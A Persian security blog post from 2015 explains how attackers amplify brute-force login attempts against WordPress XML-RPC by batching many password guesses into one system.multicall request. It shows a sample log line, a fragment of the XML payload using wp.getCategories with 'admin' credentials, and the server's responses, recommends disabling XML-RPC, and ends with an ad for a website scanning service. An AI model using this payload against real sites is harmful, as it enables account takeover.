تقویت حملات Brute Force علیه XMLRPC ورد پرس (25 مهر 1394)

حمله Brute Force یکی از قدیمی ترین و متداول ترین حمله در سطح اینترنت می باشد. در صورتی که شما دارای سرور باشید بدانید که همین الان حمله Brute Force بر روی آن صورت پذیرفته است. این حمله توانایی عملیاتی شدن بر روی پروتکل های SSH ، FTP و وب سرور را دارد. جلوگیری از این حمله کار دشواری نیست اما بیشتر اوقات بر روی وب سایت ها عملیاتی می گردد.

تقویت Brute Force

چگونه هکر می تواند سر و صدای این حمله را کاهش دهد؟ چگونه هکر می تواند تنها با یک درخواست بیش از 500 رمز عبور را بر وی یک نام کاربری تست کند؟ یکی از ویژگی های XMLRPC در سامانه مدیریت محتوای ورد پرس استفاده از متد system.multicall در جهت اجرای چندین درخواست از طریق 1 درخواست می باشد. برای مثال لاگ زیر استفاده از صد ها تلاش به منظور لاگین شدن در سامانه ورد پرس را تنها از طریق 1 درخواست نشان می دهد.

194.150.168.95 – – [07/Oct/2015:23:54:12 -0400] “POST /xmlrpc.php HTTP/1.1″ 200 14204 “-” “Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1

هکر از طریق این متد توانایی دور زدن یا bypass نمودن ابزار های امنیتی را در جهت تست 100 رمز عبور خواهد داشت.بسیاری از هکر ها از طریق متد wp.getCategories در جهت حمله Brute Force استفاده می کنند که شبیه کد زیر می باشد:

<methodCall><methodName>system.multicall</methodName>
<member><name>methodName</name><value><string>wp.getCategories</string></value></member>
<member><name>params</name><value><array><data>
<value><string></string></value><value><string>admin</string></value><value><string>demo123</string></value>
..
<member><name>methodName</name><value><string>wp.getCategories</string></value></member>
<member><name>params</name><value><array><data>
<value><string>admin</string></value>
<value><string>site.com</string></value>

ورد پرس XMLRPC این درخواست را بصورت زیر پاسخ می دهد.

[{‘faultCode’: 403, ‘faultString’: ‘Incorrect username or password.‘}, {‘faultCode’: 403, ‘faultString’: ‘Incorrect username or password.‘}, {‘faultCode’: 403, ‘faultString’: ‘Incorrect username or password.’}, {‘faultCode’: 403, ‘faultString’: ‘Incorrect username or password.’}, {‘faultCode’: 403, ‘faultString’: …
[[{‘url’: ‘http://site.com/wordpress/’, ‘isAdmin’: True, ‘blogid’: ‘1’, ‘xmlrpc’: ‘http://site.com/wordpress/xmlrpc.php’, ‘blogName’: ‘wpxxx’}]]]

پیشنهاد ما استفاده از پلاگین حذف و یا غیر فعال نمودن XMLRPC می باشد.

اسکن امنیتی وب سایت
(5000 تومان)

نوع وب سایت: وبلاگ، شرکتی، تجارت الکترونیک و کسب و کارحرفه ای
آسیب پذیری های OWASP (شامل بررسی 10 آسیب پذیری متداول)
اسکن نرم افزار/وب سایت توسط Acunetix نسخه 11
اسکن تمامی پورت ها با ابزار Nmap
اسکن وب سرور و پیکربندی آن توسط ابزار Nikto
اسکن تزریق توسط نرم افزار قدرتمند SQLmap